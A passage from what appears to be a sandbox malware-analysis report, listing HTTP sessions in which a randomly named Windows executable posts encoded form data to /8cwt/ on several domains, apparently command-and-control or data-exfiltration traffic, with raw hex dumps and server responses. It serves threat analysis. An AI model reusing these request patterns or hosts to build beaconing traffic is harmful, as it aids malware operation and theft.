                                      Jun 4, 2024 14:18:59.382294893 CEST275INData Raw: a0 12 26 c9 6c af 55 af eb 52 7d a0 cf b2 2e ed ab 41 b7 01 03 6e 10 04 06 4b 89 18 7d 52 79 fc 19 7d fd 8a aa 02 ce b7 03 01 fa f0 b1 37 bb fd 91 08 3d 7a b4 f1 48 14 c0 03 7d d3 aa 6b 60 15 86 cc 9f 43 19 f6 2f 21 a1 0e 76 41 31 10 6c 01 5d 43
                                      Data Ascii: &lUR}.AnK}Ry}7=zH}k`C/!vA1l]Cs33yr>0l<y:Otd7C!h#p\8\n:@*"8a.Z"G?`GqTB-LyP}y:CXEL#R?T1


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.11.304988092.205.8.26802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:19:01.857976913 CEST432OUTGET /8cwt/?24eluX=/eyPcvofDN2lSaRtaOy598Um2jV4WFkB8F+tj/gurFaBNg3fGC8Bq8tEkH7S9Bted1WP+/9Tvc8BBtdeQx/29+uX5MeVdplxqUx1gZhmZuS5o8pYgM2a/wg=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.belgravevilla.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:19:02.408593893 CEST546INHTTP/1.1 301 Moved Permanently
                                      Date: Tue, 04 Jun 2024 12:19:01 GMT
                                      Server: Apache
                                      X-Powered-By: PHP/8.1.28
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      X-Redirect-By: WordPress
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Location: http://belgravevilla.com/8cwt/?24eluX=/eyPcvofDN2lSaRtaOy598Um2jV4WFkB8F+tj/gurFaBNg3fGC8Bq8tEkH7S9Bted1WP+/9Tvc8BBtdeQx/29+uX5MeVdplxqUx1gZhmZuS5o8pYgM2a/wg=&Mjnd0=JZHP8Tx0t6
                                      Vary: Accept-Encoding
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.11.30498813.64.163.50802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:19:07.791268110 CEST683OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.insist.site
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.insist.site
                                      Referer: http://www.insist.site/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 73 44 39 76 50 68 67 70 44 45 77 5a 7a 74 4e 39 32 2f 67 31 30 41 68 61 4c 68 30 50 62 33 36 53 51 73 63 69 6f 79 63 69 61 6c 62 77 63 2b 36 45 38 71 44 7a 4a 38 31 31 38 31 6f 31 75 38 53 7a 67 4f 55 68 55 76 30 48 50 65 59 51 78 74 69 52 38 6b 47 4f 6c 32 68 63 35 64 56 78 6e 7a 4f 2b 53 57 69 57 48 73 72 6f 6e 53 30 52 69 51 78 6e 56 66 72 70 58 52 55 78 53 6b 70 6c 6b 45 6f 39 75 7a 49 62 37 73 73 75 48 44 39 47 4e 62 66 6e 48 4f 78 38 4c 33 35 2f 51 66 78 4e 67 35 59 42 59 61 61 48 56 6b 7a 65 65 6e 75 33 30 4c 75 64 55 75 38 46 4b 39 73 54 56 33 67 55 37 56 36 79 63 77 3d 3d
                                      Data Ascii: 24eluX=sD9vPhgpDEwZztN92/g10AhaLh0Pb36SQscioycialbwc+6E8qDzJ81181o1u8SzgOUhUv0HPeYQxtiR8kGOl2hc5dVxnzO+SWiWHsronS0RiQxnVfrpXRUxSkplkEo9uzIb7ssuHD9GNbfnHOx8L35/QfxNg5YBYaaHVkzeenu30LudUu8FK9sTV3gU7V6ycw==
                                      Jun 4, 2024 14:19:08.011444092 CEST289INHTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Tue, 04 Jun 2024 12:19:07 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 62 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 73 69 73 74 2e 73 69 74 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7<html>9 <head>4b <meta http-equiv='refresh' content='0; url=http://www.insist.site/' />a </head>8</html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.11.30498823.64.163.50802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:19:10.538608074 CEST703OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.insist.site
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.insist.site
                                      Referer: http://www.insist.site/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 73 44 39 76 50 68 67 70 44 45 77 5a 69 38 39 39 36 38 49 31 31 67 68 5a 58 78 30 50 4f 6e 36 4f 51 73 51 69 6f 7a 4a 2f 61 51 4c 77 66 65 4b 45 39 72 44 7a 4b 38 31 31 33 56 6f 30 68 63 53 38 67 4f 59 70 55 72 30 48 50 65 6b 51 78 6f 65 52 39 58 75 4a 6c 6d 67 36 32 39 56 7a 71 54 4f 2b 53 57 69 57 48 74 4f 31 6e 53 38 52 69 68 42 6e 57 2b 72 71 4a 42 55 79 43 30 70 6c 75 6b 6f 35 75 7a 4a 4f 37 74 41 45 48 42 46 47 4e 5a 48 6e 41 66 78 7a 46 33 34 36 64 2f 77 70 6c 4a 5a 4f 63 62 65 36 52 6d 62 64 63 6e 76 49 34 38 66 48 4a 74 49 48 5a 64 51 2b 4a 32 4e 38 35 58 37 70 42 35 43 54 42 35 44 35 59 6a 4e 2f 6b 34 42 5a 4b 61 4d 50 32 46 67 3d
                                      Data Ascii: 24eluX=sD9vPhgpDEwZi89968I11ghZXx0POn6OQsQiozJ/aQLwfeKE9rDzK8113Vo0hcS8gOYpUr0HPekQxoeR9XuJlmg629VzqTO+SWiWHtO1nS8RihBnW+rqJBUyC0pluko5uzJO7tAEHBFGNZHnAfxzF346d/wplJZOcbe6RmbdcnvI48fHJtIHZdQ+J2N85X7pB5CTB5D5YjN/k4BZKaMP2Fg=
                                      Jun 4, 2024 14:19:10.756767988 CEST289INHTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Tue, 04 Jun 2024 12:19:10 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 62 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 73 69 73 74 2e 73 69 74 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7<html>9 <head>4b <meta http-equiv='refresh' content='0; url=http://www.insist.site/' />a </head>8</html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      35192.168.11.30498833.64.163.50802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:19:13.290023088 CEST1620OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.insist.site
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.insist.site
                                      Referer: http://www.insist.site/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 73 44 39 76 50 68 67 70 44 45 77 5a 69 38 39 39 36 38 49 31 31 67 68 5a 58 78 30 50 4f 6e 36 4f 51 73 51 69 6f 7a 4a 2f 61 51 44 77 63 74 79 45 38 4a 72 7a 45 63 31 31 70 6c 6f 35 68 63 53 6c 67 4e 6f 74 55 72 35 6c 50 59 67 51 77 4b 47 52 6f 57 75 4a 71 6d 67 36 30 39 56 75 6e 7a 4f 72 53 58 4f 53 48 73 2b 31 6e 53 38 52 69 69 70 6e 42 2f 72 71 4f 78 55 78 53 6b 70 68 6b 45 6f 52 75 7a 68 65 37 74 46 7a 48 53 4e 47 55 35 58 6e 47 74 4a 7a 61 6e 34 30 52 66 77 78 6c 4a 55 4f 63 62 53 4d 52 6c 48 33 63 6e 58 49 37 71 69 38 63 35 51 6f 50 50 49 31 4b 46 64 31 32 6b 2f 6e 4b 36 65 56 41 70 44 54 5a 54 68 78 6b 4d 56 37 53 76 51 5a 68 46 6a 45 6a 76 79 55 6c 47 51 48 43 32 74 45 48 37 67 65 37 41 7a 32 6d 71 4f 32 4e 4d 69 5a 67 46 37 6b 75 73 61 4d 4a 30 34 53 41 65 58 4a 38 6f 31 76 31 69 39 2b 45 34 75 51 55 48 2f 4a 65 50 70 57 4d 6f 33 56 4f 56 46 6f 4b 70 41 6f 38 4b 78 69 67 53 51 49 6d 53 44 4a 63 47 76 52 43 55 56 2f 77 51 53 78 74 76 78 63 6c 56 4f 7a 5a 38 32 66 6c 5a 49 [TRUNCATED]
                                      Data Ascii: 24eluX=sD9vPhgpDEwZi89968I11ghZXx0POn6OQsQiozJ/aQDwctyE8JrzEc11plo5hcSlgNotUr5lPYgQwKGRoWuJqmg609VunzOrSXOSHs+1nS8RiipnB/rqOxUxSkphkEoRuzhe7tFzHSNGU5XnGtJzan40RfwxlJUOcbSMRlH3cnXI7qi8c5QoPPI1KFd12k/nK6eVApDTZThxkMV7SvQZhFjEjvyUlGQHC2tEH7ge7Az2mqO2NMiZgF7kusaMJ04SAeXJ8o1v1i9+E4uQUH/JePpWMo3VOVFoKpAo8KxigSQImSDJcGvRCUV/wQSxtvxclVOzZ82flZI1cNnlfpjImFO83guVQ7t70k9NqUx/F9zEPm6bCR7LJcKf9+M4+Sd/ZXc0cbx09Ef0QHlKKvNoYcUxIh0qZ4E0eUiKTbvDwnaRywk2YJL9ogkwiSB6sYy/G7W63TlxJIT7WCl/RyTUMckpIYNnRP/uNoCZCSerpwIVVTYyeR3KmlQSYk6gZ/akrNWvil9q2O1RzwqF9DsirccKMdwZJmlPaaM/97OmPtUX8qh7Bs6Ab/9IGcMCnn2zUup1h21FdecnsIXoHvqOJN0H7xxszF+YWw7Qdn+UDJNfqpc7O7K1DEWdgdz8LDQs6RlvtgtDz0tOJ1eDytGGK0aK2XoFL3Qw/Zz0P5Q9h36sm2PJjqFdIK2OnKpTdwl2XwTuUkQNgjZAl1407x1o0Gs8xdLeUlZ3a61oXOhwAnzuH21z1UjAVYgtPSPksM5wqt1WH1XTPA9z8ql8fNlyv3GXSF7RPhPrt/vH4E7AB93GGJTK8C5reryAjfpUe3WGZetQy4uV9Z8wa4rGKScD+4ubMCvZuZyVw4UM4Mtzv+TA/czlrBODEqiXclX5BPXvA8N9TONHYki+rlnitL/mkTr7HUPeZXa8z24KNMikOmIXoWdLEQ76ZSr/9gxWx3533A95qW2Ax9J8vuW2pU06nEX7F/0RiaLLAbttaJI2p3+6z [TRUNCATED]
                                      Jun 4, 2024 14:19:13.509655952 CEST289INHTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Tue, 04 Jun 2024 12:19:13 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 62 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 73 69 73 74 2e 73 69 74 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7<html>9 <head>4b <meta http-equiv='refresh' content='0; url=http://www.insist.site/' />a </head>8</html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      36192.168.11.30498843.64.163.50802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:19:16.037266016 CEST426OUTGET /8cwt/?24eluX=hBVPMRA8AXkfi8sX3ZU3xUlYATFWOWKaW/82pjFjYWbiYeLOxLODNY5T0HEKtdu9psozILhwOJRChZ+L+nmp0Ast2pFtgkKWXgnlG+28tA4JhCFPXI/mZUw=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.insist.site
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:19:16.255780935 CEST289INHTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Tue, 04 Jun 2024 12:19:16 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 62 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 73 69 73 74 2e 73 69 74 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7<html>9 <head>4b <meta http-equiv='refresh' content='0; url=http://www.insist.site/' />a </head>8</html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      37192.168.11.304988591.195.240.19802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:19:38.111289024 CEST686OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.nurenose.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.nurenose.com
                                      Referer: http://www.nurenose.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 67 59 58 78 57 66 61 39 71 4f 6f 71 63 74 47 61 39 63 2b 51 47 66 68 51 73 6f 70 4b 68 31 34 54 46 2b 4e 62 7a 46 66 72 36 67 4b 42 38 71 4e 39 67 30 36 44 48 53 53 43 76 63 42 4e 67 52 62 59 6f 2f 53 51 6d 78 74 65 59 66 50 59 70 70 6c 5a 6d 72 68 4d 6f 33 75 35 44 4e 70 30 59 4f 34 67 47 4d 36 6c 42 6f 59 59 56 35 50 2b 39 34 38 76 58 7a 4d 4b 58 41 79 50 67 38 38 30 59 56 75 49 61 47 51 37 61 35 73 30 2f 6b 4b 35 6d 38 70 39 32 56 72 58 78 51 47 58 33 61 44 39 72 2b 7a 76 74 77 47 63 78 72 51 61 65 72 42 36 4b 4b 78 67 79 6b 6f 4a 34 77 7a 45 70 6a 53 70 79 52 2b 72 52 41 3d 3d
                                      Data Ascii: 24eluX=gYXxWfa9qOoqctGa9c+QGfhQsopKh14TF+NbzFfr6gKB8qN9g06DHSSCvcBNgRbYo/SQmxteYfPYpplZmrhMo3u5DNp0YO4gGM6lBoYYV5P+948vXzMKXAyPg880YVuIaGQ7a5s0/kK5m8p92VrXxQGX3aD9r+zvtwGcxrQaerB6KKxgykoJ4wzEpjSpyR+rRA==
                                      Jun 4, 2024 14:19:38.335360050 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      38192.168.11.304988691.195.240.19802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:19:40.869891882 CEST706OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.nurenose.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.nurenose.com
                                      Referer: http://www.nurenose.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 67 59 58 78 57 66 61 39 71 4f 6f 71 64 4d 57 61 36 37 53 51 41 2f 67 69 31 59 70 4b 76 6c 34 58 46 2b 52 62 7a 42 48 42 36 53 75 42 38 4c 39 39 68 31 36 44 53 53 53 43 37 73 41 4a 75 78 62 70 6f 2f 65 59 6d 78 42 65 59 66 4c 59 70 72 74 5a 6c 61 68 4c 36 58 75 2f 57 39 70 32 48 65 34 67 47 4d 36 6c 42 6f 4d 6d 56 35 58 2b 39 49 73 76 57 58 67 4e 62 67 79 41 32 73 38 30 4f 6c 75 4d 61 47 51 5a 61 34 41 4b 2f 6d 43 35 6d 39 5a 39 32 48 44 59 36 51 47 4e 39 36 43 4d 6d 2f 47 63 6f 79 71 76 67 6f 38 53 47 61 5a 68 50 64 41 36 76 6e 63 4c 72 51 50 70 31 69 2f 42 77 54 2f 77 4d 50 6c 54 6b 35 35 43 4c 57 71 6d 37 37 39 44 39 4d 4b 77 6e 31 6f 3d
                                      Data Ascii: 24eluX=gYXxWfa9qOoqdMWa67SQA/gi1YpKvl4XF+RbzBHB6SuB8L99h16DSSSC7sAJuxbpo/eYmxBeYfLYprtZlahL6Xu/W9p2He4gGM6lBoMmV5X+9IsvWXgNbgyA2s80OluMaGQZa4AK/mC5m9Z92HDY6QGN96CMm/Gcoyqvgo8SGaZhPdA6vncLrQPp1i/BwT/wMPlTk55CLWqm779D9MKwn1o=
                                      Jun 4, 2024 14:19:41.097110033 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      39192.168.11.304988791.195.240.19802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:19:43.621416092 CEST1623OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.nurenose.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.nurenose.com
                                      Referer: http://www.nurenose.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 67 59 58 78 57 66 61 39 71 4f 6f 71 64 4d 57 61 36 37 53 51 41 2f 67 69 31 59 70 4b 76 6c 34 58 46 2b 52 62 7a 42 48 42 36 53 6d 42 38 35 31 39 68 53 47 44 55 69 53 43 34 73 41 45 75 78 62 4f 6f 38 75 55 6d 78 39 6b 59 63 6a 59 72 49 31 5a 78 34 4a 4c 77 58 75 2f 55 39 70 33 59 4f 34 31 47 49 6d 66 42 6f 63 6d 56 35 58 2b 39 4b 6b 76 54 7a 4d 4e 64 67 79 50 67 38 38 43 59 56 75 6f 61 47 49 6a 61 34 45 61 2f 58 69 35 6f 39 4a 39 30 30 72 59 35 77 47 54 2b 36 43 55 6d 2f 61 44 6f 79 32 4e 67 70 4a 48 47 59 35 68 50 6f 74 7a 33 47 6f 2f 30 52 54 6d 32 57 7a 67 36 41 66 46 41 38 39 48 69 4c 31 4f 50 32 69 59 30 39 35 47 76 2b 32 6f 30 31 46 34 64 32 7a 42 4f 4b 77 53 53 4b 42 32 54 71 65 6a 68 61 69 73 70 63 67 6a 33 61 57 50 4b 71 52 50 79 32 37 6b 4c 49 6a 43 67 50 61 54 41 51 59 7a 30 69 52 66 36 45 58 57 65 63 63 72 43 72 75 32 33 55 68 5a 49 53 61 2f 4d 43 73 4b 76 72 33 45 56 52 62 49 43 34 4b 62 4d 34 73 48 62 4b 43 74 6a 52 75 6b 77 33 6a 6c 58 78 69 45 4d 63 76 4c 62 33 75 [TRUNCATED]
                                      Data Ascii: 24eluX=gYXxWfa9qOoqdMWa67SQA/gi1YpKvl4XF+RbzBHB6SmB8519hSGDUiSC4sAEuxbOo8uUmx9kYcjYrI1Zx4JLwXu/U9p3YO41GImfBocmV5X+9KkvTzMNdgyPg88CYVuoaGIja4Ea/Xi5o9J900rY5wGT+6CUm/aDoy2NgpJHGY5hPotz3Go/0RTm2Wzg6AfFA89HiL1OP2iY095Gv+2o01F4d2zBOKwSSKB2Tqejhaispcgj3aWPKqRPy27kLIjCgPaTAQYz0iRf6EXWeccrCru23UhZISa/MCsKvr3EVRbIC4KbM4sHbKCtjRukw3jlXxiEMcvLb3uMPIMXbvoMxUwFjN5jw8hZ5jYLq4uqv+pLMUxkoVqNoQ3BpzbTj2tPeyRo0fHAFk3jweF1ql15+1uZ7Hjcjy30I2Oah0PNXmMekZfastzvwLvfFNdwPKRdVw1ccr9VBsMlT5MjOMqUC0IiwLy1XjpFosBeDtlJMZ2qoH3nwhks1cHN7Xm0oBV3kc8P4g8KPXDp2/q0RGbQOP7GDf7t3mj7GomujO+8Zod9QshdxU1ocwCs7bu9EfRjG1u2iCZ+5skyqa4yDEeXnF9Hz4ireeek/Kbg+BVhnMaEjCJllCHKP72oxq0uZ4CtOnFBUn+T5HSpMtkMIgD6VVje5/Fkd2wh2QsJn8um5iJj9E8yuIl9lLcXO5PAzDAY3ZTU5zs7koN2Qf8+ya50rAS4ArAPoH4YezxG+FutETSBcMJOdfY4QXfsJS5eElc2MS18eEfdgeBTFbHeKgzT8Hw2WfDptQCQ8drhBLFF0FkyfEOdES36HidzAXVgoRezFjpreBKd9nOVqmSjQ/i4FCPL+R6Cw7aKK7carix1P/y3CNH3T3E/ySHnC4g8K1DF9CM7g6BVGKcO8hEDVJt/qDEwc3b/GovYHKvv8zf2Cltb6hg5r1si4Of/X0EUFNZN8qCmlZG80RW05OKF696le86yHw6YGjgCYabJBiNLc6BOw [TRUNCATED]
                                      Jun 4, 2024 14:19:43.849981070 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      40192.168.11.304988891.195.240.19802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:19:46.381886005 CEST427OUTGET /8cwt/?24eluX=ta/RVvqxwt03TPXWzdfJPt4x66UfuVsjNv5QpTaL8gP24YNLrE30I2eSxM0VtxXCv+eA5B8kQfuz0YxEkZl7phijUbluJOwzHO73Kb9kDKOg+aMKAT0Adgs=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.nurenose.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:19:46.606271029 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
